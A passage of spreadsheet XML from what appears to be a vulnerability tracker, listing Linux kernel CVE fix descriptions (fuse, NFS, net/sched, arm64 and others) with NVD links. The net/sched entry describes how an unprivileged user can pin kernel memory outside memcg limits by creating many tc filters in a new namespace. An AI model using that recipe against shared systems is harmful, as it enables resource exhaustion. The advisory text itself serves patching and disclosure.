Check l2cap_chan::conn.hcon corresponds to an alive hci_conn before
trying to use it in l2cap_sock.c.  Hold l2cap_chan_lock() in
getsockopt/setsockopt to ensure it stays alive, and to avoid data races
in l2cap_chan fields.</t>
        </is>
      </c>
      <c r="T461" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90093</t>
        </is>
      </c>
    </row>
    <row r="462">
      <c r="A462" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B462" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C462" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90094</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2026-09-17</t>
        </is>
      </c>
      <c r="P462" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q462" s="5" t="inlineStr"/>
      <c r="R462" s="5" t="inlineStr"/>
      <c r="S462" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
arm64: process: Fix context switching MTE store-only tag check
SCTLR_EL1.TCSO0 is set when user opt-in for MTE store-only tag check
mode. However, it is not part of SCTLR_USER_MASK which imply that on
context switch we never clear SCTLR_EL1.TCSO0, so we are leaking that
setting into another task.
Fix that by including SCTLR_EL1_TCSO0_MASK into SCTLR_USER_MASK</t>
        </is>
      </c>
      <c r="T462" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90094</t>
        </is>
      </c>
    </row>
    <row r="463">
      <c r="A463" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B463" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C463" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90095</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2026-09-17</t>
        </is>
      </c>
      <c r="P463" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q463" s="5" t="inlineStr"/>
      <c r="R463" s="5" t="inlineStr"/>
      <c r="S463" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
fuse: Fix the condition to enable over-io-uring
The existing condition in fuse_uring_cmd() is there only to avoid
disabling io-uring for connections that already run with it, missing
was a condition to refuse any IORING_OP_URING_CMD if the
connection/channel didn't get enabled because of missing FUSE_INIT
reply flag FUSE_OVER_IO_URING. Without the reply flag the barrier in
fuse_uring_ready() doesn't work and IO could already be going on and
cause deadlock states (at a minimum one between fch-&gt;bg_lock and
queue-&gt;lock).
The change itself is trivial, but brings behavior change,
FUSE_OVER_IO_URING has to be set in the FUSE_INIT_REPLY by fuse servers
to accept any IORING_OP_URING_CMD. Libfuse does that and the only
non-libfuse implementation I found (fractal-fuse) also does it.
Qemu patches for fuse-io-uring are not merged yet, as far as I know.
Moved up is the smp_load_acquire(&amp;fch-&gt;initialized) check, as a
fuse-server implementation might try to setup io-uring before FUSE_INIT
is processed and might have gotten -EOPNOTSUPP instead of -EAGAIN.
Also fixed is a stale comment that explains the handling of the
FUSE_OVER_IO_URING flag in early RFC versions.
If there should be a report from any library or application we
probably need to revert this commit.</t>
        </is>
      </c>
      <c r="T463" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90095</t>
        </is>
      </c>
    </row>
    <row r="464">
      <c r="A464" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B464" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C464" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90096</t>
        </is>
      </c>
      <c r="D464" s="5" t="inlineStr"/>
      <c r="E464" s="5" t="inlineStr"/>
      <c r="F464" s="5" t="inlineStr"/>
      <c r="G464" s="5" t="inlineStr"/>
      <c r="H464" s="5" t="inlineStr"/>
      <c r="I464" s="5" t="inlineStr"/>
      <c r="J464" s="5" t="inlineStr"/>
      <c r="K464" s="5" t="inlineStr"/>
      <c r="L464" s="5" t="inlineStr"/>
      <c r="M464" s="5" t="inlineStr"/>
      <c r="N464" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O464" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P464" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q464" s="5" t="inlineStr"/>
      <c r="R464" s="5" t="inlineStr"/>
      <c r="S464" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
fuse: invalidate the correct range after O_APPEND direct write
fuse_direct_write_iter() captures pos before generic_write_checks(),
which moves ki_pos to EOF for O_APPEND writes:
  fuse_direct_write_iter()
  {
      pos = iocb-&gt;ki_pos;           /* 0 (user-supplied)       */
      generic_write_checks();       /* ki_pos -&gt; EOF           */
      fuse_direct_io();             /* writes at EOF, correct  */
      invalidate(pos, pos + res);   /* [0, res) -- wrong       */
  }
The post-write invalidation targets a stale range instead of the
actual written range at EOF.
This can cause data inconsistency when the file size is not
page-aligned.  The tail page straddling EOF has a valid portion
before EOF that concurrent readers can fault back in during the
DIO write window:
  Tail page (file size X not page-aligned):
    page_start         X (EOF)   page_end
    |--- valid data ----|-- stale --|
  CPU0 (O_APPEND DIO writer)    CPU1 (buffered reader)
  --------------------------    ----------------------
  invalidate [X, X+len)
    tail page evicted
  FUSE_WRITE in flight ...
                                read [page_start, X)
                                  tail page re-faulted
                                  [X, page_end) = stale
  FUSE_WRITE completes
  i_size = X + len
  invalidate [0, len)  &lt;- WRONG
    tail page still cached
                                read [X, X+len)
                                  hits stale tail page
                                  returns old data
Fix by reading pos back from iocb-&gt;ki_pos after generic_write_checks(),
as generic_file_direct_write() does.
Also fix a typo in the comment ("may have" -&gt; "may have competed").</t>
        </is>
      </c>
      <c r="T464" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90096</t>
        </is>
      </c>
    </row>
    <row r="465">
      <c r="A465" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B465" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C465" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90097</t>
        </is>
      </c>
      <c r="D465" s="5" t="inlineStr"/>
      <c r="E465" s="5" t="inlineStr"/>
      <c r="F465" s="5" t="inlineStr"/>
      <c r="G465" s="5" t="inlineStr"/>
      <c r="H465" s="5" t="inlineStr"/>
      <c r="I465" s="5" t="inlineStr"/>
      <c r="J465" s="5" t="inlineStr"/>
      <c r="K465" s="5" t="inlineStr"/>
      <c r="L465" s="5" t="inlineStr"/>
      <c r="M465" s="5" t="inlineStr"/>
      <c r="N465" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O465" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P465" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q465" s="5" t="inlineStr"/>
      <c r="R465" s="5" t="inlineStr"/>
      <c r="S465" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
Drivers: hv: vmbus: Skip VMBus module cleanup for non-nested root partition
The VMBus module initialization function, hv_acpi_init(), currently
does nothing when running in the root partition and root is not nested
in another VM. But the initialization function reports success, so the
VMBus module is indeed loaded. VMBus functionality is not actually
needed, but the VMBus module must be loaded so that hv_vmbus_exists()
can answer correctly. Furthermore, the mshv_root dependency on the
VMBus module is needed as described in the commit message for
840b740a35bf ("mshv: Add conditional VMBus dependency").
Loading the VMBus module without actually initializing it causes
failures if the module should later be unloaded. The module unload code
tries to clean up things that were never initialized, resulting in
memory faults and a panic.
Fix this by having VMBus module exit function perform the same
check for non-nested root partition, and do nothing in such a
case, just like hv_acpi_init().
In the long run, the code that manages the Hyper-V provided SynIC
should be refactored to better coordinate the requirements of
root partition scenarios and normal VM scenarios, and to hopefully
remove the hv_vmbus_exists() dependnecy between mshv_root and
VMBus modules. Preventing the current unload failure scenario is
an expediency until such a refactoring is done.</t>
        </is>
      </c>
      <c r="T465" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90097</t>
        </is>
      </c>
    </row>
    <row r="466">
      <c r="A466" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B466" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C466" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90098</t>
        </is>
      </c>
      <c r="D466" s="5" t="inlineStr"/>
      <c r="E466" s="5" t="inlineStr"/>
      <c r="F466" s="5" t="inlineStr"/>
      <c r="G466" s="5" t="inlineStr"/>
      <c r="H466" s="5" t="inlineStr"/>
      <c r="I466" s="5" t="inlineStr"/>
      <c r="J466" s="5" t="inlineStr"/>
      <c r="K466" s="5" t="inlineStr"/>
      <c r="L466" s="5" t="inlineStr"/>
      <c r="M466" s="5" t="inlineStr"/>
      <c r="N466" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O466" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P466" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q466" s="5" t="inlineStr"/>
      <c r="R466" s="5" t="inlineStr"/>
      <c r="S466" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: sparx5: fix sleep in atomic context in MAC table access
sparx5_set_rx_mode() runs with netif_addr_lock_bh held and iterates
dev-&gt;mc via __dev_mc_sync(), which per address calls sparx5_mc_sync() /
sparx5_mc_unsync() -&gt; sparx5_mact_learn() / sparx5_mact_forget().  These
take sparx5-&gt;lock, a mutex, and then poll the MAC access command
register with readx_poll_timeout(). A mutex may block, which is not
allowed from atomic context.
Convert the driver to the new .ndo_set_rx_mode_async callback introduced
in commit 3554b4345d85 ("net: introduce ndo_set_rx_mode_async and
netdev_rx_mode_work"). The async callback is invoked from process
context, so the mutex and sleeping completion poll can remain.
Observed with CONFIG_PROVE_LOCKING, CONFIG_DEBUG_SPINLOCK,
CONFIG_DEBUG_MUTEXES and CONFIG_DEBUG_ATOMIC_SLEEP enabled:
  BUG: sleeping function called from invalid context at kernel/locking/mutex.c:591
  in_atomic(): 1, irqs_disabled(): 0, non_block: 0, pid: 217, name: ip
  preempt_count: 201, expected: 0
  Call trace:
   __might_resched+0x144/0x248
   __might_sleep+0x48/0x7c
   __mutex_lock+0x74/0x850
   mutex_lock_nested+0x24/0x30
   sparx5_mact_learn+0x78/0x100
   sparx5_mc_sync+0x40/0x54
   __hw_addr_sync_dev+0xc4/0x170
   sparx5_set_rx_mode+0x4c/0x58
   __dev_set_rx_mode+0x64/0xa4
   __dev_open+0x1ec/0x26c</t>
        </is>
      </c>
      <c r="T466" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90098</t>
        </is>
      </c>
    </row>
    <row r="467">
      <c r="A467" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B467" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C467" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90099</t>
        </is>
      </c>
      <c r="D467" s="5" t="inlineStr"/>
      <c r="E467" s="5" t="inlineStr"/>
      <c r="F467" s="5" t="inlineStr"/>
      <c r="G467" s="5" t="inlineStr"/>
      <c r="H467" s="5" t="inlineStr"/>
      <c r="I467" s="5" t="inlineStr"/>
      <c r="J467" s="5" t="inlineStr"/>
      <c r="K467" s="5" t="inlineStr"/>
      <c r="L467" s="5" t="inlineStr"/>
      <c r="M467" s="5" t="inlineStr"/>
      <c r="N467" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O467" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P467" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q467" s="5" t="inlineStr"/>
      <c r="R467" s="5" t="inlineStr"/>
      <c r="S467" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/sched: account classifier filter allocations to memcg
Allocations in the tc classifier *_change() paths (filter objects,
per-CPU counters, and per-filter aux data) use plain GFP_KERNEL without
__GFP_ACCOUNT, allowing unprivileged users to pin kernel memory outside
memcg charging. The shared tcf_exts_init_ex() action array allocation in
cls_api.c was also uncharged; this patch closes it along with the
per-classifier filter-object/percpu/aux allocations that remain
unaccounted.
Add GFP_KERNEL_ACCOUNT to:
- the shared tcf_exts_init_ex() action array (cls_api.c), common to every
  filter of every classifier (32 pointers, 256 bytes);
- the filter-object, per-CPU-counter, and per-filter aux allocations in
  cls_basic, cls_bpf, cls_cgroup, cls_flow, cls_flower, cls_fw,
  cls_matchall, cls_route and cls_u32;
- the u32_init_knode() replace-path knode allocation (cls_u32.c), which
  allocates the same struct tc_u_knode + sel.keys on every replace of an
  existing knode and was missed by the create-path-only conversion.
Also fix the cls_basic error path: basic_change() inserts fnew into the
IDR before allocating the per-CPU counter. If alloc_percpu() fails the
errout path kfree'd fnew without idr_remove, leaving a dangling pointer
in the IDR. With GFP_KERNEL_ACCOUNT the percpu alloc becomes failable
on demand (memcg at memory.max), making the dead path attacker-reachable
and burning the handle permanently. Add the idr_remove on the percpu
failure path, matching the basic_set_parms failure-path pattern.
Note: vega@nebusec.ai provided a poc for basic_cls, but it was easy to
extend to the other classifiers.
Conditions to recreate the bug:
- CONFIG_NET_SCHED, CONFIG_NET_CLS_* (the classifier being used),
  CONFIG_NET_CLS_ACT, CONFIG_MEMCG, CONFIG_USER_NS, CONFIG_NET_NS.
- Unprivileged user in a fresh user+network namespace (unshare -Urn),
  or root with CAP_NET_ADMIN.
- Create a large number of tc filters (e.g. tc filter add dev lo
  ingress ... &lt;classifier&gt; ...) while watching a memcg-limited cgroup:
  system slab grows far faster than memory.current, pinning kernel
  memory outside memcg charging.</t>
        </is>
      </c>
      <c r="T467" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90099</t>
        </is>
      </c>
    </row>
    <row r="468">
      <c r="A468" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B468" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C468" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90100</t>
        </is>
      </c>
      <c r="D468" s="5" t="inlineStr"/>
      <c r="E468" s="5" t="inlineStr"/>
      <c r="F468" s="5" t="inlineStr"/>
      <c r="G468" s="5" t="inlineStr"/>
      <c r="H468" s="5" t="inlineStr"/>
      <c r="I468" s="5" t="inlineStr"/>
      <c r="J468" s="5" t="inlineStr"/>
      <c r="K468" s="5" t="inlineStr"/>
      <c r="L468" s="5" t="inlineStr"/>
      <c r="M468" s="5" t="inlineStr"/>
      <c r="N468" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O468" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P468" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q468" s="5" t="inlineStr"/>
      <c r="R468" s="5" t="inlineStr"/>
      <c r="S468" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ptp: netc: fix period truncation and potential divide-by-zero in PEROUT
The max_period bound in net_timer_enable_perout() was computed as:
  max_period = (u64)NETC_TMR_DEFAULT_FIPER + integral_period;
which exceeds U32_MAX when integral_period &gt; 0 (e.g. 0x100000002 for
the default 333333333 Hz clock). A period_ns that passes this check but
exceeds U32_MAX is then silently truncated when stored into the u32
struct netc_pp::period field.
A truncated value of zero can reach netc_timer_set_perout_alarm(), where
the local u32 period variable would also be 0, causing a divide-by-zero
in roundup_u64(delta, period) whenever the stime &lt; min_time branch is
taken (which always happens for a start time of {0, 0}).
Additionally, netc_timer_enable_periodic_pulse() and
netc_timer_enable_fiper() both compute:
  fiper = pp-&gt;period - integral_period;
A zero pp-&gt;period results in an unsigned wraparound to 0xFFFFFFFD,
mis-programming the FIPER hardware register.
Fix all three issues by capping max_period at NETC_TMR_DEFAULT_FIPER
(0xFFFFFFFF). This ensures that any period_ns passing the range check
fits in a u32 without truncation, so the stored value is always valid
and non-zero. The accepted range is reduced by integral_period ns
(typically only a few nanoseconds), which is negligible in practice.</t>
        </is>
      </c>
      <c r="T468" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90100</t>
        </is>
      </c>
    </row>
    <row r="469">
      <c r="A469" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B469" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C469" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90101</t>
        </is>
      </c>
      <c r="D469" s="5" t="inlineStr"/>
      <c r="E469" s="5" t="inlineStr"/>
      <c r="F469" s="5" t="inlineStr"/>
      <c r="G469" s="5" t="inlineStr"/>
      <c r="H469" s="5" t="inlineStr"/>
      <c r="I469" s="5" t="inlineStr"/>
      <c r="J469" s="5" t="inlineStr"/>
      <c r="K469" s="5" t="inlineStr"/>
      <c r="L469" s="5" t="inlineStr"/>
      <c r="M469" s="5" t="inlineStr"/>
      <c r="N469" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O469" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P469" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q469" s="5" t="inlineStr"/>
      <c r="R469" s="5" t="inlineStr"/>
      <c r="S469" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bnxt_en: Fix call to hardware monitoring event handler
The first parameter of hwmon_notify_event() is supposed to be the hardware
monitoring device. The bnxt driver calls it with the platform device as
first parameter instead. This API break results in undefined behavior and
may result in a crash.
Pass the hardware monitoring device as parameter instead to fix the
problem.</t>
        </is>
      </c>
      <c r="T469" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90101</t>
        </is>
      </c>
    </row>
    <row r="470">
      <c r="A470" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B470" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C470" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90102</t>
        </is>
      </c>
      <c r="D470" s="5" t="inlineStr"/>
      <c r="E470" s="5" t="inlineStr"/>
      <c r="F470" s="5" t="inlineStr"/>
      <c r="G470" s="5" t="inlineStr"/>
      <c r="H470" s="5" t="inlineStr"/>
      <c r="I470" s="5" t="inlineStr"/>
      <c r="J470" s="5" t="inlineStr"/>
      <c r="K470" s="5" t="inlineStr"/>
      <c r="L470" s="5" t="inlineStr"/>
      <c r="M470" s="5" t="inlineStr"/>
      <c r="N470" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O470" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P470" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q470" s="5" t="inlineStr"/>
      <c r="R470" s="5" t="inlineStr"/>
      <c r="S470" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
NFSv4/pnfs: key the data server cache on the NFS version
nfs4_pnfs_ds_add() keys the per-net data server cache on the multipath
address set alone, and struct nfs4_pnfs_ds records no version. That
suffices for the files layout driver, which always connects with version
4, but flexfiles takes its version tuple from GETDEVICEINFO per device,
and one address can legitimately serve both NFSv3 and NFSv4.
Two deviceids on one address with different ds_versions[0].version
therefore share a single nfs4_pnfs_ds, and whichever mirror connects
first pins ds_clp to its own version. The other one is handed that
client anyway, so it selects rpc_call_ops for a version the connection
does not speak, and the mismatched sequence-slot handling dereferences
NULL.
Add the version to the cache key so the two cannot alias, giving each
version its own nfs4_pnfs_ds and connection while both mirrors stay
usable. Only the major version is compared, since that is what selects
rpc_call_ops and rpc_ops; v4.0 and v4.1 keep sharing a client. The files
layout driver passes the 4 it already hardcodes at connect time.</t>
        </is>
      </c>
      <c r="T470" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90102</t>
        </is>
      </c>
    </row>
    <row r="471">
      <c r="A471" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B471" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C471" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90103</t>
        </is>
      </c>
      <c r="D471" s="5" t="inlineStr"/>
      <c r="E471" s="5" t="inlineStr"/>
      <c r="F471" s="5" t="inlineStr"/>
      <c r="G471" s="5" t="inlineStr"/>
      <c r="H471" s="5" t="inlineStr"/>
      <c r="I471" s="5" t="inlineStr"/>
      <c r="J471" s="5" t="inlineStr"/>
      <c r="K471" s="5" t="inlineStr"/>
      <c r="L471" s="5" t="inlineStr"/>
      <c r="M471" s="5" t="inlineStr"/>
      <c r="N471" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O471" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P471" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q471" s="5" t="inlineStr"/>
      <c r="R471" s="5" t="inlineStr"/>
      <c r="S471" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
NFSv4.2: fix LAYOUTSTATS send buffer exhaustion
encode_layoutstats_maxsz budgets XDR_QUADLEN(PNFS_LAYOUTSTATS_MAXSIZE),
i.e. 256 bytes, for the layoutupdate4 body written by the layout driver.
The flexfiles record can exceed that.
ff_layout_encode_ff_layoutupdate() emits, per data server, a netaddr4,
an nfs_fh4, two ff_io_latency4, an nfstime4 and a bool.  A data server
whose filehandle is NFS_MAXFHSIZE bytes long already accounts for 132 of
those bytes, and the two ff_io_latency4 at 64 bytes each, the nfstime4
and the bool add a further 144, so the body passes 256 bytes before the
netaddr4 is encoded at all.  encode_layoutstats() additionally writes
the deviceid4 and the layoutupdate4 lou_type word, neither of which the
macro accounts for.
The filehandle and the address are both chosen by the server, through
LAYOUTGET and GETDEVICEINFO, so it can drive the encoder past the
end of the send buffer.  xdr_reserve_space() returns NULL once that
happens, and the two ff_layout_encode_io_latency() calls run with
dss_info-&gt;mirror-&gt;lock held, so a NULL return there leaves the lock
permanently held.
Raise PNFS_LAYOUTSTATS_MAXSIZE to 384 so that the record fits inside the
reservation.</t>
        </is>
      </c>
      <c r="T471" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90103</t>
        </is>
      </c>
    </row>
    <row r="472">
      <c r="A472" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B472" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C472" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90104</t>
        </is>
      </c>
      <c r="D472" s="5" t="inlineStr"/>
      <c r="E472" s="5" t="inlineStr"/>
      <c r="F472" s="5" t="inlineStr"/>
      <c r="G472" s="5" t="inlineStr"/>
      <c r="H472" s="5" t="inlineStr"/>
      <c r="I472" s="5" t="inlineStr"/>
      <c r="J472" s="5" t="inlineStr"/>
      <c r="K472" s="5" t="inlineStr"/>
      <c r="L472" s="5" t="inlineStr"/>
      <c r="M472" s="5" t="inlineStr"/>
      <c r="N472" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O472" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P472" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q472" s="5" t="inlineStr"/>
      <c r="R472" s="5" t="inlineStr"/>
      <c r="S472" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
NFSv4.1: zero referring call lists before decoding
decode_cb_sequence_args() allocates csa_rclists with kmalloc_objs(), so
each referring_call_list starts uninitialized. decode_rc_list() assigns
rcl_refcalls only when rcl_nrefcalls is nonzero. A valid list with zero
referring calls therefore leaves the pointer uninitialized, and
nfs4_callback_sequence() later passes stale slab contents to kfree().
Allocate csa_rclists with kzalloc_objs() so every rcl_refcalls member is
NULL from the beginning, including valid empty referring call lists.</t>
        </is>
      </c>
      <c r="T472" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90104</t>
        </is>
      </c>
    </row>
    <row r="473">
      <c r="A473" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B473" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C473" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90105</t>
        </is>
      </c>
      <c r="D473" s="5" t="inlineStr"/>
      <c r="E473" s="5" t="inlineStr"/>
      <c r="F473" s="5" t="inlineStr"/>
      <c r="G473" s="5" t="inlineStr"/>
      <c r="H473" s="5" t="inlineStr"/>
      <c r="I473" s="5" t="inlineStr"/>
      <c r="J473" s="5" t="inlineStr"/>
      <c r="K473" s="5" t="inlineStr"/>
      <c r="L473" s="5" t="inlineStr"/>
      <c r="M473" s="5" t="inlineStr"/>
      <c r="N473" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O473" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P473" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q473" s="5" t="inlineStr"/>
      <c r="R473" s="5" t="inlineStr"/>
      <c r="S473" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
vxlan: fix reading neigh ha
Currently arp/neigh_reduce read neigh ha directly which can lead to
partial reads while the neigh is being updated. Use neigh_ha_snapshot to
take a stable snapshot of the address similar to route_shortcircuit which
already does the right thing.</t>
        </is>
      </c>
      <c r="T473" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90105</t>
        </is>
      </c>
    </row>
    <row r="474">
      <c r="A474" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B474" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C474" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90106</t>
        </is>
      </c>
      <c r="D474" s="5" t="inlineStr"/>
      <c r="E474" s="5" t="inlineStr"/>
      <c r="F474" s="5" t="inlineStr"/>
      <c r="G474" s="5" t="inlineStr"/>
      <c r="H474" s="5" t="inlineStr"/>
      <c r="I474" s="5" t="inlineStr"/>
      <c r="J474" s="5" t="inlineStr"/>
      <c r="K474" s="5" t="inlineStr"/>
      <c r="L474" s="5" t="inlineStr"/>
      <c r="M474" s="5" t="inlineStr"/>
      <c r="N474" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O474" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P474" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q474" s="5" t="inlineStr"/>
      <c r="R474" s="5" t="inlineStr"/>
      <c r="S474" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: bridge: arp/nd proxy: fix reading neigh ha
Currently neigh ha address is read directly, but that can result in
torn/partial reads if the neigh is being updated. Use neigh_ha_snapshot
to take a stable snapshot of the address.</t>
        </is>
      </c>
      <c r="T474" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90106</t>
        </is>
      </c>
    </row>
    <row r="475">
      <c r="A475" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B475" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C475" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90107</t>
        </is>
      </c>
      <c r="D475" s="5" t="inlineStr"/>
      <c r="E475" s="5" t="inlineStr"/>
      <c r="F475" s="5" t="inlineStr"/>
      <c r="G475" s="5" t="inlineStr"/>
      <c r="H475" s="5" t="inlineStr"/>
      <c r="I475" s="5" t="inlineStr"/>
      <c r="J475" s="5" t="inlineStr"/>
      <c r="K475" s="5" t="inlineStr"/>
      <c r="L475" s="5" t="inlineStr"/>
      <c r="M475" s="5" t="inlineStr"/>
      <c r="N475" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O475" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P475" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q475" s="5" t="inlineStr"/>
